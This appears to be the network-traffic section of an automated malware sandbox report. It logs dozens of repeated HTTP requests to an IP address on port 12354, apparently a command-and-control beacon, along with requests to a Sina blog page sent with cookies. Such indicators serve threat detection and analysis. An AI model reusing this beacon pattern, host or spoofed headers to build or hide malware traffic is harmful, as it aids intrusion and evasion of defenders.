Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
